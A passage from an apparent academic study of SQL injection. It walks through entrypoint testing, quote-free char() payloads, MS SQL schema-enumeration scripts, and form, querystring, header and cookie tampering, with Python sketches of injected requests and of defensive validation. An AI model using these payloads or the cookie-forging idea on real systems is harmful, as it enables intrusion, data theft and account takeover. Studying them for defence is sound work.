application only restricted the field length at client-side and failed to implement
the same safeguard at server-side. Because HTML is a user-editable frontend, it was fairly
simple to override the client-side field length limitation and proceed with the attack.
Scripts and applications that do not control variable length may even permit other
attacks, such as buffer overruns. However, newer platforms such as the .NET Framework
from Microsoft do not impose a practical limitation on many of their strong data types,
e.g. strings, arrays, streams, etc.; in reality there is only a theoretical, hard-to-reach limit.
Though database fields are explicitly limited in their lengths, the same does not happen
with the variables used by the application. While it is true that a runtime error will be
thrown by the RDBMS if the application tries to insert a value bigger than the allotted
field length, an attacker who successfully injects a very large string and alters the carrier
query will not necessarily violate any database field length. Unfortunately, the only way to
ensure variable size is not an exploitable asset is having developers painstakingly compare
the length of the variables received to the database field lengths. Not only is this a
time-consuming task, but some applications, typically Web applications, tend to undergo
rapid development cycles and short change-management plans, which completely
undermines the concept of comparing lengths.
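The server-side comparison of received lengths against database field lengths need not be elaborate. Below is a minimal Python sketch of such a check. The field names and their limits are hypothetical and would in practice be taken from the actual database schema. The function name check_lengths is likewise an assumption.

```python
# Hypothetical column widths, e.g. copied from the database schema.
FIELD_LIMITS = {"Description": 50, "Username": 20}


def check_lengths(values, limits=FIELD_LIMITS):
    """Return the sorted names of fields that are unknown or exceed their column width."""
    offending = []
    for name, value in values.items():
        limit = limits.get(name)
        # Unknown fields are rejected too, since no width is known for them.
        if limit is None or len(value) > limit:
            offending.append(name)
    return sorted(offending)
```

Running the check on the server, independently of any limit set in the HTML form, addresses the situation described above where only the client-side restriction existed.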

4Type Casting & Variable Morphism
Entrypoints that deal with numeric values are a good place to start assessing the
application’s proneness to implicit type casting and variable morphism. With numeric
values, it is possible to exploit a query simply by using basic arithmetic operations. For
instance, let's look at the following link:
<a href="/eCommerceSite/productDetails.asp?ProdID=4">....</a>
Testing this request for SQL Injection is very simple. One attempt is done by injecting 4' as
the parameter and the other is done using 3 + 1. Assuming this parameter is passed to
an SQL request, the result of the two tests will be the following two SQL queries:
SELECT * FROM Products WHERE ProdID = 4'
SELECT * FROM Products WHERE ProdID = 3 + 1
Whereas the first query will definitely generate an error, or at least a neatly formatted
application response stating the product was not found or that an error has occurred, the
second query will yield product number 4.
Now let’s suppose this application’s developer is somewhat aware of the SQL
Injection threat and that he double checks all input for single quotation marks using a
simple function such as this:
function escape(input)
escape = replace(input, "'", "''")
end function
Although the hacker found a convenient entrypoint for perpetrating an attack, the
numeric field, it is impossible to inject any statement containing string literals, as single
quotation marks will be doubled and treated as literal characters, thus making the
injected statements useless. For example, inserting string values into a table would be
impossible. Suppose the hacker wanted to
insert a new entry into the users table. If he did not mind using a numeric username and
a numeric password, then the following statement would work:
insert into users values(776,123,123,0xffff)
It would work for the simple reason that the RDBMS will automatically cast numeric values to
string values implicitly if the target column is of type char or varchar (see Table 3 - Explicit
and Implicit Type Conversions in MS SQL Server 2005 on page 149).
4Single Quotation Marks in Building Dynamic Queries
If the application or one of its stored procedures uses string concatenation for
constructing dynamic SQL statements, then there is a pretty good chance single
quotation marks on the carrier query can be manipulated in order to piggy-back a
second statement. In the «Real Environment Test» shown in the Experimenting chapter,
a single quotation mark on a textbox was all it took to cause a syntax error and raise an
error message. But there are cases where developers filter single quotation marks as in
the above example. Fortunately for the attacker, there are ways to conceal single
quotation marks or even discard the need for them:
insert into users values(777,
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
0xffff)
Using the char function it was possible to describe a string in a statement even without
using any quotation marks. This technique can be extrapolated to other scenarios as well.
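Both the numeric entrypoint and the char function show that doubling single quotation marks alone is not an adequate safeguard, since neither case needs a quotation mark at all. From the defender's side, a numeric parameter is better handled by refusing anything that is not a plain integer. The following Python sketch illustrates the difference. The function escape_quotes mirrors the escape function from the text, whereas parse_product_id and its rules are assumptions made for illustration.

```python
def escape_quotes(value):
    # Mirrors the escape() function in the text: doubles single quotation marks.
    return value.replace("'", "''")


def parse_product_id(raw):
    """Accept only a plain non-negative decimal integer; raise ValueError otherwise."""
    if not raw.isascii() or not raw.isdigit():
        raise ValueError("ProdID must be a non-negative integer")
    return int(raw)


def is_valid_product_id(raw):
    """Convenience wrapper returning True or False instead of raising."""
    try:
        parse_product_id(raw)
        return True
    except ValueError:
        return False
```

An input such as 1; Drop Table Products passes through escape_quotes unchanged because it contains no quotation marks, yet is_valid_product_id rejects it, as it also rejects the arithmetic probe 3 + 1.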

4Discovering Database Objects
Many of the samples presented required a somewhat magical understanding of the
database structure, but in reality the database structure is kept well hidden from
the user. Uncovering the inner structure of the RDBMS will require the use of DML
statements and the DDL stack as well. Discovering the database structure is therefore the
last step of poking for vulnerabilities, as it needs to combine several of the atomic
vulnerabilities and methods previously assessed; yet it precedes the choice of means for
perpetrating the attack. For this matter, a list of handy injectable sample scripts is
presented here.
Getting an approximate count for all the tables:
SELECT [TableName] = so.name, [RowCount] = MAX(si.rows)
FROM sysobjects so, sysindexes si
WHERE so.xtype = 'U' AND si.id = OBJECT_ID(so.name)
GROUP BY so.name ORDER BY 2 DESC
Getting an exact count for all the tables:
DECLARE @SQL VARCHAR(255)
SET @SQL = 'DBCC UPDATEUSAGE (' + DB_NAME() + ')'
EXEC(@SQL)
CREATE TABLE #foo
(
tablename VARCHAR(255),
rc INT
)
INSERT #foo
EXEC sp_msForEachTable
'SELECT PARSENAME(''?'', 1),
COUNT(*) FROM ?'
SELECT tablename, rc
FROM #foo
ORDER BY rc DESC
DROP TABLE #foo

Getting a full report on the tables’ space usage:
DBCC UPDATEUSAGE(0)
CREATE TABLE #t (
id INT,
TableName VARCHAR(255),
NRows INT,
Reserved FLOAT,
TableSize FLOAT,
IndexSize FLOAT,
FreeSpace FLOAT )
INSERT #t EXEC sp_msForEachTable 'SELECT
OBJECT_ID(PARSENAME(''?'',1)),
PARSENAME(''?'',1),
COUNT(*),0,0,0,0 FROM ?'
DECLARE @low INT
SELECT @low = [low] FROM master.dbo.spt_values
WHERE number = 1 AND type = 'E'
UPDATE #t SET Reserved = x.r, IndexSize = x.i FROM
(SELECT id, r = SUM(si.reserved), i = SUM(si.used)
FROM sysindexes si
WHERE si.indid IN (0, 1, 255)
GROUP BY id) x
WHERE x.id = #t.id
UPDATE #t SET TableSize = (SELECT SUM(si.dpages)
FROM sysindexes si
WHERE si.indid < 2 AND si.id = #t.id)
UPDATE #t SET TableSize = TableSize +
(SELECT COALESCE(SUM(used), 0)
FROM sysindexes si
WHERE si.indid = 255 AND si.id = #t.id)
UPDATE #t SET FreeSpace = Reserved - IndexSize
UPDATE #t SET IndexSize = IndexSize - TableSize
SELECT tablename, nrows,
Reserved = LTRIM(STR(
reserved * @low / 1024.,15,0) +
' ' + 'KB'),
DataSize = LTRIM(STR(
tablesize * @low / 1024.,15,0) +
' ' + 'KB'),
IndexSize = LTRIM(STR(
indexSize * @low / 1024.,15,0) +
' ' + 'KB'),
FreeSpace = LTRIM(STR(
freeSpace * @low / 1024.,15,0) +
' ' + 'KB')
FROM #t
ORDER BY 1
DROP TABLE #t

Getting a full report on the columns of a table including field types and lengths:
Declare @TableName varchar(255)
set @TableName = 'Product'
SELECT
COLUMN_NAME,
DATA_TYPE,
isnull(CHARACTER_MAXIMUM_LENGTH,0) AS 'LENGTH',
IS_NULLABLE,
ISNULL((SELECT 'Y' FROM SYSFOREIGNKEYS WHERE
FKEYID =ID AND FKEY=COLID),'N') as 'IsForeignKey',
Ordinal_Position,
SYSCOLUMNS.IsComputed,
IsIdentity,
IsRowGuidCol
FROM
SYSCOLUMNS,
(SELECT
COLUMN_NAME,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
Ordinal_Position,
COLUMNPROPERTY(OBJECT_ID(@TableName),
INFORMATION_SCHEMA.COLUMNS.COLUMN_NAME,
'IsIdentity') AS IsIdentity,
COLUMNPROPERTY(OBJECT_ID(@TableName),
INFORMATION_SCHEMA.COLUMNS.COLUMN_NAME,
'IsRowGuidCol') AS IsRowGuidCol
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
TABLE_NAME =@TableName) AS A
WHERE
ID
IN
(SELECT ID FROM SYSOBJECTS WHERE TYPE='U' AND NAME
=@TableName)
AND
A.COLUMN_NAME =NAME
Order By
Ordinal_Position

4Offline Research
Many Web and regular applications are not developed in-house but are software
packages distributed more or less across the globe. For example, many large
corporations use SAP R/3 as their ERP system, Siebel for CRM and countless others for
addressing internal and external business demands. If a company wanted to implement
an e-Commerce site, it would probably purchase some kind of software package or
pre-built framework instead of painstakingly developing everything from scratch, as
companies have to struggle with Heterogeneity and Change in order to stay in business.
Identifying that a particular software package is being used can work to the offender’s
advantage, even knowing that the software house will constantly search for and correct
vulnerabilities. Let’s suppose that our attacker is a disgruntled employee who carries out
his daily routine using the SAP GUI. Since he knows the company is using SAP R/3 as its
ERP platform, let’s suppose that through social engineering or any other method
he finds out that SAP is running MS SQL Server as its backend RDBMS. Holding this
information, the attacker builds a lab environment at home using pirate copies of the
software easily obtained from the Internet. Because he owns the environment, he
replicates his regular tasks on the SAP GUI. At the same time he uses a tool called SQL
Server Profiler, which is shipped with MS SQL Server, in order to discover how the
applicational components on the business layer convert user input into dynamic
statements (see Figure 8 - Classic Three-Tier Web Architecture Model on page 40). Similar
tools exist for other RDBMS vendors. These tools make it possible to sniff which
statements are being executed in real-time against the RDBMS. Understanding exactly how
the application takes user input and hands it to the backend RDBMS will allow our
disgruntled employee to bypass all the difficulty of poking for vulnerabilities using an
inductive approach and jump ahead to a deductive approach based on direct observation.

Figure 29 - Sniffing SQL Statements Processed by the RDBMS in Real-Time
In the comfort of his home, the offender can take as much time as he wants to study
and prepare the attack without taking any risks. Discovering whether the application has
been developed in-house or is a software package is therefore highly relevant, as it may
allow the hacker to reduce the chances of being exposed and provide the necessary time to
optimize the attack.
4 Choosing Means
Once the attack’s objectives are set out, tools ready, prerequisites met, and weak spots
targeted, the attacker must choose the means for perpetrating the attack. The attack
lifecycle must be seen as an upward spiral mounting throughout the attack’s lifespan, as
attackers may iteratively combine steps in order to fulfil their objectives. So it is plausible
that the attacker will revisit this step on several occasions when accounting for any of the
previous steps. Choosing means will allow the attacker to choose the delivery method for
the malicious payload which ultimately, depending on the attack’s objectives, could
encompass the full extent of available means of attack. There are numerous ways to
inject an application, spanning from very low-level network protocols to the application
layer of the OSI model (see Figure 5 - The Seven Layers of the OSI Model on page 32).
Because SQL Injection is a logical type of attack, the author prefers to concentrate on
delivery methods that promote exploitation of logic instead of low-level network
protocols. Furthermore, though SQL Injection is not a Web-specific issue, a webbed
environment will be used to describe the delivery methods as the Web offers an ample
scenario easily extrapolated to other contexts.
4Web Form Manipulation
An attacker can use forms, the typical frontend of a tiered application, to enter parts of
SQL statements such as SQL keywords, control characters or data in order to manipulate
underlying application server-side scripts or programs (Landsmann & Strömberg 2003).
Forms do not necessarily expose user-input fields, but they always contain fields for
controlling the flow of information. Whether the form exposes fields for human
interaction, internal fields for flow control, or a mixture of both (the most common
configuration), the HTML code always contains fields that can be edited on the client
side. At first, Web forms may be perceived as non-editable since they are the output of a
server-side application component; the reason they are editable lies in the basics. HTTP,
the application-level protocol used by Web traffic (see Figure 5 - The Seven Layers of the
OSI Model on page 32), is by nature a stateless protocol designed to operate
disconnected from its data source. Data is exchanged between client and server only for
brief periods; once the client has everything it needs, the connection is severed and the
user navigates the page offline. The browser handles these downloaded resources
offline, and they are frequently cached on disk for a faster user experience.
The HTML page containing the Web form, and with it the information context, is therefore
stored locally. The user may even save the page explicitly to his hard disk and look at the
client-side code of the form, using Notepad for example, as in the following sample:
<html>
<head><title>
Sample Page
</title></head>
<body>
<form name="form1" method="post" action="Default.aspx" id="form1"
enctype="multipart/form-data">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwULLTEzMTU4Nzk0NTQPZBYCAgMPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGFkZEeyI59iHqwSX1KSk9BRXTYZ8nOM" />
</div>
<div>
<input name="price" type="hidden" id="price" value="332"
MaxLength="10" /><br />
<input name="ProductID" type="text" id="ProductID" value="123" />
<input name="CustomerName" type="text" id="CustomerName" value="" />
<input type="submit" name="doSubmit" value="Submit" id="doSubmit" />
</div>
<div>
<input type="hidden" name="__EVENTVALIDATION"
id="__EVENTVALIDATION"
value="/wEWBAKoieCRBgKjjN2hAwKbufQdAqqp28wHXcqFkrTTO8aON7Y0yh/p6BfnGL8=" />
</div>
</form>
</body>
</html>
The fields of the form can clearly be seen, as well as their values and types. If, for example, a
field imposed a limit on the number of characters permitted, e.g. through a MaxLength
attribute like the one in the sample, the hacker could simply change that limit in order to
accommodate the length of the injected script. Typically, hidden fields are used by the
application to control the flow of information and navigation context, e.g. the site section
the user is on, his language preferences, etc., whereas visible fields are meant for user
interaction. Regardless of the field type, all fields are potential entrypoints for SQL
Injection. However,
experience indicates that hidden fields used for persisting the application’s concept of a
session-driven user experience are the most susceptible to injection attacks since
developers do not expect them to be manipulated. In many cases, developers trust
their development environments to handle session-driven navigation seamlessly,
hence it is very common for these fields to be left unchecked. The last thing
remaining is to alter the form’s target location. When the form is executed within a server
environment, it will most certainly refer to network resources using relative paths in order
to keep the application loosely coupled with the server. The name of the resource that
will be handling the request can be clearly identified within the form declaration tag:
<form name="form1" method="post" action="Default.aspx" id="form1"
enctype="multipart/form-data">
All the hacker would have to do is change the value of the action property so that it
contains the full URL of the network resource, e.g.:
<form name="form1" method="post" action="http://someSite/someDir/Default.aspx"
id="form1" enctype="multipart/form-data">
Once he opens the local HTML page in the browser and presses the submit button, the
manipulated form containing injected code is posted back to the server and processed.
4URL Header Manipulation
There are two ways of sending data from a Web form to a server resource: POST and GET.
POST sends its contents across the wire in the body of the HTTP request. These contents
can be rather large and may include binary files, and the user does not get to see them.
GET uses the URL of the resource in order to pass text-based arguments, e.g.
http://someServer/somePage.aspx?ProductID=1&Lang=PT. It
is in practice limited in length (255 characters is the traditional safe figure, although most
browsers and Web servers allow far more), and
the user actually sees which contents are being sent to the server. Because these settings
are accessible through the browser’s address bar, users can manipulate them at will.
Setting the method property of a form to GET or simply calling the target URL configured
on the action property with additional parameters amounts to the same thing. A hacker
could very well manipulate the parameters on the URL, also known as the querystring, to
his advantage. It is very common to find this configuration on product lists that require
the user to select a particular product in order to get more details. This is usually done
through a querystring containing the product’s primary key, which is passed to another
network resource that queries the database by product id and yields the
specifications for the selected product.
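A minimal sketch of such a product details page follows. It assumes Python's sqlite3 module as the database; the products table and the product_details handler are hypothetical, and only the URL shape is taken from the example above. The handler reads ProductID from the querystring and concatenates it into the query without any checking.

```python
import sqlite3
from urllib.parse import urlparse, parse_qs

def product_details(conn, url):
    # Hypothetical page handler: reads ProductID from the querystring and
    # concatenates it, unchecked, into the query text.
    product_id = parse_qs(urlparse(url).query)["ProductID"][0]
    sql = "SELECT id, name FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO products VALUES (?, ?)",
                 [(1, "Widget"), (2, "Gadget"), (3, "Gizmo")])

normal = product_details(
    conn, "http://someServer/somePage.aspx?ProductID=1&Lang=PT")

# The same request with the numeric parameter extended by a tautology.
# %20 decodes to a space, so the server-side value becomes "1 OR 1=1".
tampered = product_details(
    conn, "http://someServer/somePage.aspx?ProductID=1%20OR%201=1&Lang=PT")

print(len(normal), len(tampered))
```

Because the parameter is numeric, no quotation mark is needed to break out of the statement: the regular request yields one product, while the edited one yields every row in the table.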
Apart from the practical limit on URL length, which varies across browsers and Web
servers, URL header manipulation allows just about everything Web form manipulation
allows. Furthermore, URL-based strings are
probably the best source for finding numeric fields being sent to the database, opening
the door for exploitation of type casting and variable morphism.
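The two delivery methods described so far, an edited form posted to the full URL of the resource and an edited querystring, can be sketched with Python's standard urllib package. Field names and URLs are taken from the samples shown earlier; the injected values are illustrative assumptions, and the form is sent URL-encoded rather than as multipart/form-data to keep the sketch short. Nothing is transmitted: the requests are only built and inspected.

```python
from urllib.parse import urlencode
from urllib.request import Request

# Form fields as found in the saved page, with edited values.
fields = {
    "price": "332",             # hidden field, editable on the client side
    "ProductID": "123 OR 1=1",  # no MaxLength applies outside the browser
    "CustomerName": "",
    "doSubmit": "Submit",
}

# POST: the fields travel in the body of the request.
post_request = Request(
    "http://someSite/someDir/Default.aspx",
    data=urlencode(fields).encode("ascii"),
    method="POST",
)

# GET: the same kind of payload travels in the querystring.
query = urlencode({"ProductID": "1 OR 1=1", "Lang": "PT"})
get_request = Request("http://someServer/somePage.aspx?" + query)

# Nothing is sent here; urllib.request.urlopen(request) would submit it.
print(post_request.get_method(), post_request.data)
print(get_request.get_method(), get_request.full_url)
```

Either way the server receives exactly the bytes the sender chose, so client-side restrictions such as field lengths or hidden field values offer no protection.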
4HTTP Header Manipulation
Whenever an HTTP request or response is issued, a set of headers envelops it.
These are known as HTTP headers and can contain various types of information.
On the server side they are exposed to the application, together with other request
metadata, as server variables, which carry information on both the client and the server.
Applications with some level of complexity make use of the information available at the
HTTP header level. The following table shows some common server variables available on
regular HTTP requests:
Name                  Description
ALL_HTTP              Returns all HTTP headers sent by the client. Always prefixed with HTTP_ and capitalized
ALL_RAW               Returns all headers in raw form
APPL_MD_PATH          Returns the meta base path for the application for the ISAPI DLL
APPL_PHYSICAL_PATH    Returns the physical path corresponding to the meta base path
AUTH_PASSWORD         Returns the value entered in the client's authentication dialog
AUTH_TYPE             The authentication method that the server uses to validate users
AUTH_USER             Returns the raw authenticated user name
CERT_COOKIE           Returns the unique ID for client certificate as a string
CERT_FLAGS            bit0 is set to 1 if the client certificate is present and bit1 is set to 1 if the certification authority of the client certificate is not valid
CERT_ISSUER           Returns the issuer field of the client certificate
CERT_KEYSIZE          Returns the number of bits in Secure Sockets Layer connection key size
CERT_SECRETKEYSIZE    Returns the number of bits in server certificate private key
CERT_SERIALNUMBER     Returns the serial number field of the client certificate
CERT_SERVER_ISSUER    Returns the issuer field of the server certificate
CERT_SERVER_SUBJECT   Returns the subject field of the server certificate
CERT_SUBJECT          Returns the subject field of the client certificate
CONTENT_LENGTH        Returns the length of the content as sent by the client
CONTENT_TYPE          Returns the data type of the content
GATEWAY_INTERFACE     Returns the revision of the CGI specification used by the server
HTTP_<HeaderName>     Returns the value stored in the header HeaderName
HTTP_ACCEPT           Returns the value of the Accept header
HTTP_ACCEPT_LANGUAGE  Returns a string describing the language to use for displaying content
HTTP_COOKIE           Returns the cookie string included with the request
HTTP_REFERER          Returns a string containing the URL of the page that referred the request to the current page using an <a> tag. If the page is redirected, HTTP_REFERER is empty
HTTP_USER_AGENT       Returns a string describing the browser that sent the request
HTTPS                 Returns ON if the request came in through secure channel or OFF if the request came in through a non-secure channel
HTTPS_KEYSIZE         Returns the number of bits in Secure Sockets Layer connection key size
HTTPS_SECRETKEYSIZE   Returns the number of bits in server certificate private key
HTTPS_SERVER_ISSUER   Returns the issuer field of the server certificate
HTTPS_SERVER_SUBJECT  Returns the subject field of the server certificate
INSTANCE_ID           The ID for the IIS instance in text format
INSTANCE_META_PATH    The meta base path for the instance of IIS that responds to the request
LOCAL_ADDR            Returns the server address on which the request came in
LOGON_USER            Returns the Windows account that the user is logged into
PATH_INFO             Returns extra path information as given by the client
PATH_TRANSLATED       A translated version of PATH_INFO that takes the path and performs any necessary virtual-to-physical mapping
QUERY_STRING          Returns the query information stored in the string following the question mark (?) in the HTTP request
REMOTE_ADDR           Returns the IP address of the remote host making the request
REMOTE_HOST           Returns the name of the host making the request
REMOTE_USER           Returns an unmapped user-name string sent in by the user
REQUEST_METHOD        Returns the method used to make the request
SCRIPT_NAME           Returns a virtual path to the script being executed
SERVER_NAME           Returns the server's host name, DNS alias, or IP address as it would appear in self-referencing URLs
SERVER_PORT           Returns the port number to which the request was sent
SERVER_PORT_SECURE    Returns a string that contains 0 or 1. If the request is being handled on the secure port, it will be 1. Otherwise, it will be 0
SERVER_PROTOCOL       Returns the name and revision of the request information protocol
SERVER_SOFTWARE       Returns the name and version of the server software that answers the request and runs the gateway
URL                   Returns the base portion of the URL
Table 4 - Common HTTP Server Variables
> adapted from (W3 Schools 2006) <
Similarly to fields on a Web form, or to querystring parameters, HTTP headers can be
manipulated to the attacker’s advantage. If any HTTP header is used in the
construction of a dynamic SQL statement, then there is a chance to manipulate the
headers in order to perform an SQL Injection attack. The special thing about HTTP headers
is that they cannot be manipulated using a regular browser. The attacker would have
to use some third-party tool, or build a program, e.g. using the System.Net.WebClient
class of the Microsoft .NET Framework, in order to issue an HTTP request and
manipulate the headers.
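As an illustration of such a program, the sketch below uses Python's urllib instead of the .NET WebClient class named above. The URL is a placeholder, and the visit_log table and track_referer function are hypothetical stand-ins for server-side code that builds a dynamic statement from a header; sqlite3 plays the part of the RDBMS. The request is built but never sent.

```python
import sqlite3
from urllib.request import Request

# A request whose Referer header is chosen by the sender, not by a browser.
request = Request("http://someServer/somePage.aspx")
request.add_header("Referer", "x'), ('injected-row")

def track_referer(conn, referer):
    # Hypothetical server-side logging that concatenates the header value
    # into the statement text.
    sql = "INSERT INTO visit_log VALUES('" + referer + "')"
    conn.execute(sql)

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE visit_log (referer TEXT)")

# Simulate the server handling the forged header.
track_referer(conn, request.get_header("Referer"))
rows = conn.execute("SELECT referer FROM visit_log").fetchall()
print(rows)
```

The quotation mark inside the header value closes the string literal early, so a single request writes two rows instead of one. The harmless extra row stands in for whatever statement fragment an attacker would choose.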
As a real example, ILIAS Open Source, a popular Web-based learning management
system, had, and maybe still has, an entrypoint vulnerable to SQL Injection at the HTTP
header level, as it implements the following logic:
$sql="INSERT INTO tracking_temp VALUES('$HTTP_REFERER')"
The HTTP_REFERER header, which contains the URL of the page that referred the
request, could easily be manipulated in order to inject malicious statements.
4Cookie Poisoning
Cookies are text files stored by the browser on the user’s hard disk on behalf of the Web
application. These have a maximum size of 4 KB and are used to persist user settings
such as preferred language, preferred currency, etc., so the next time the user accesses
the Web resource, contents get automatically contextualized to the user’s preferences. It
is also very common to authenticate users using cookies, thus avoiding the hassle of
filling in a login and a password each time the user uses the site. There is another
category of cookies that are not persisted to the user’s hard disk. These are named
session cookies. They have the same limitations and role, but live inside an HTTP header
sent back and forth throughout the duration of the site experience. Although cookies
hold very limited information, because their role is primarily to hold user-specific data
with direct consequences on the contents to be rendered, it is almost guaranteed that
information stored in cookies will take part in the formulation of dynamically generated
SQL statements. Since persistent cookies are stored on file, they can be very easily located
and edited, let’s say using Notepad. Things start to get a little more interesting when
cookies are used to authenticate users, sometimes in a very naive way, as in the following
real example:
CFID□1942327□www.testking.com/□1536□2381306624□32006981□2214985776□29804244□*□CFTOKEN
69749902□www.testking.com/□1536□2381306624□32006981□2215085776□29804244□*□USERID□3812
46□www.testking.com/□1536□1669978496□30206549□2485775776□29804244□*□USERVALID□CD1B970
B%2DB8E4%2D41E8%2D85DC%2D2EE2F13F2B4F□www.testking.com/□1536□4117451264□29819516□3108
155632□29813508□*□CARTID□0□www.testking.com/□1536□1462948352□30215813□3108355632□2981
3508□*□AFFILIATION□0□www.testking.com/□1536□3061045632□30005383□2485875776□29804244□*
This cookie is generated by a very well known e-Commerce website selling certification
study guides. This website allows any guest user to register and from that point on he is
considered a member of the website, just like any real customer. Although this cookie is
not very human-readable, it is possible to determine that the user is being identified by a
numeric id. If someone deletes the cookie and repeatedly registers on the site, the user id
is incremented, just like an auto-numbered primary key on a database. Now this cookie
has two major problems that a sharp mind would exploit. First, a program that
decrements the user id would allow the hacker to log on on that user’s behalf even
without knowing the corresponding login and password. Second, the user id is very likely
to be used in the WHERE clause of a query that searches the users table for a user whose
primary key matches the id on the cookie. As established previously, numeric fields are an
excellent place to start an injection attack, even if it means doing it from within a cookie.
With just a few lines of code, the attacker could forget all about the browser’s limitations
and inject the Web resource directly via the HTTP_COOKIE HTTP header.
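Both problems can be sketched in a few lines, under stated assumptions: the cookie is reduced to simple name=value pairs, the users table and its contents are invented, and lookup_user is a hypothetical reconstruction of how a server might use the id. Python's http.cookies and sqlite3 modules stand in for the real environment.

```python
import sqlite3
from http.cookies import SimpleCookie

def previous_user_cookie(cookie_header):
    # Parse the Cookie header, lower the numeric USERID by one and
    # rebuild the header string.
    jar = SimpleCookie()
    jar.load(cookie_header)
    values = {name: morsel.value for name, morsel in jar.items()}
    values["USERID"] = str(int(values["USERID"]) - 1)
    return "; ".join(f"{name}={value}" for name, value in values.items())

def lookup_user(conn, user_id):
    # Hypothetical server-side lookup that concatenates the cookie value
    # into the WHERE clause.
    sql = "SELECT login FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [(381245, "alice"), (381246, "bob")])

# First problem: a sequential id makes the neighbouring account guessable.
forged = previous_user_cookie("USERID=381246; CARTID=0; AFFILIATION=0")

# Second problem: the numeric id is an injection entrypoint.
injected = lookup_user(conn, "381246 OR 1=1")

print(forged)
print(injected)
```

A random, unguessable session token and a parameterized lookup would address the first and second problem respectively.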

4 Designing the Query
Designing the query is the final step in the chain of iterative steps. By the time the final
query is to be designed, the hacker has a clear idea of the objective he wishes to
accomplish; he has researched and assessed several attack methods that can be of some
use, ascertained which prerequisites are present, tested for weaknesses, and chosen the
delivery method for the attack. It is now time to design a query that follows the
proper structure of an SQL query expected by the RDBMS, while accounting for all the
constraints imposed by the environment. The hacker wants little exposure and, fortunately
for him, the default behaviour of Web servers is to log only requests, not the actual
information contained in the request.
Figure 30 - Typical Activity Log of a Web Server
Still, successful SQL statements that cause data to change within the RDBMS will be
logged in the database transaction log. This fact may have little consequence, as
database transaction logs tend to outgrow the actual size of the database and their
inactive part needs to be purged regularly by means of a truncate procedure.
Nonetheless, properly designing the query that will carry out the attack is a crucial step in
the whole attack lifecycle as it will inevitably determine the attack’s success.

TOWARD THE TAXONOMY
Taxonomy, from Greek ταξινομία (taxinomia) from the word taxis = order and the word
nomos = law, may refer to either a hierarchical classification of things, or the principles
underlying the classification. Almost anything, animate objects, inanimate objects, places,
and events, may be classified according to some taxonomic scheme (Wikipedia 2006b).
Like concept trees, taxonomies constitute a relatively small and manageable space of
information and are used to assist users in finding relevant information (Yip Chung et al.
2002). Whereas concept trees organize concepts from general to specific, taxonomies
offer a breakdown of navigable structures. These are mainly built and maintained
manually by human experts since constructing taxonomies requires domain knowledge,
something still somewhat cumbersome for automatic procedures to handle. Building a
new taxonomy is therefore not a simple task. Hansman (2002) compiled a set of ten
requirements that well-formed, consistent taxonomies should adhere to. These
requirements are transcribed here and will be used as the basis for constructing the SQL
Injection taxonomy of attacks:
• Accepted – The taxonomy should be structured so that it can become
generally approved;
• Comprehensible – A comprehensible taxonomy will be able to be understood
by those who are in the security field, as well as those who only have an
interest in it;
• Completeness/Exhaustive – For a taxonomy to be complete/exhaustive, it
should account for all possible attacks and provide categories for them. While it
is hard to prove a taxonomy is complete or exhaustive, they can be justified
through the successful categorisation of actual attacks;
• Determinism – The procedure of classifying must be clearly defined;
• Mutually exclusive – A mutually exclusive taxonomy will categorise each attack
into, at most, one category;
• Repeatable – Classifications should be repeatable;
• Terminology complying with established security terminology – Existing
terminology should be used in the taxonomy so as to avoid confusion and to
build on previous knowledge;
• Terms well-defined – There should be no confusion as to what a term means;
• Unambiguous – Each category of the taxonomy must be clearly defined so that
there is no ambiguity as to where an attack should be classified;
• Useful – A useful taxonomy will be able to be used in the security industry. For
example, the taxonomy should be able to be used by incident response teams.
There are countless frameworks and guidelines for building taxonomies, but this work
drew its inspiration from a semi-automatic method called Thematic Mapping (Yip Chung
et al. 2002). Though this method is meant for assisting in the process of building a
taxonomy of documents, e.g. a documents directory, many of its underlying steps offer
valuable input for building a new taxonomy. The process begins by extracting
signatures from the available content. A signature is a noun or noun phrase that is
clustered into a concept. Concepts are then organized in a tree structure like a concept
tree. From this point on, concepts are labelled according to their meaning in the
hierarchy. Good labelling is critical for easy navigation of a large taxonomy. At the end of
the procedure, a semantic representation of an initial ad-hoc reality will be obtained. This
representation will be much like an XML-based representation.
4 Unifying Definition for SQL Injection
The first step in partitioning a body of knowledge is to define the subject that is going to
be structured. The critical literature review process revealed that literature sources do
share a somewhat common understanding of the research topic; still, a global definition
has never been proposed (see «Definition for SQL Injection» on the Literature Review
chapter). For this reason, and because there is enough supporting evidence, a unifying
definition for SQL Injection is herein proposed. From this point on, the following
definition will be used as the underlying principle whenever SQL Injection is referred
to:
SQL Injection is a flaw on the input validation logic of a tiered
application that via a valid frontend receives user input containing
malicious patterns used on the construction of a dynamically-generated
legitimate SQL query, ultimately leading to the arbitrary execution of
SQL and operating system commands on the hacker’s behalf using the
application’s security context.
This definition is based upon three pillars, or main causative factors, formulated during
the critical literature review phase: i) dynamically-generated string literals; ii) embedding
into SQL statements; iii) escaping. These factors are transversally cross-sectioned by
a) tiered application model; b) user input validation logic; c) textual representation of
database query semantics.
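The three pillars can be seen at work in a minimal sketch, assuming Python's sqlite3 module and a hypothetical users table and login functions that are not part of the original text. The first function builds the query as a dynamically generated string with user input embedded in it; the second sends the same query with bound parameters, so input cannot escape its string literal.

```python
import sqlite3

def login_concatenated(conn, user, password):
    # Dynamically generated string literals embedded into the statement:
    # a quote in the input escapes the literal and becomes SQL syntax.
    sql = ("SELECT id FROM users WHERE login = '" + user +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()

def login_parameterized(conn, user, password):
    # Same query with placeholders: input is bound as data only.
    sql = "SELECT id FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchall()

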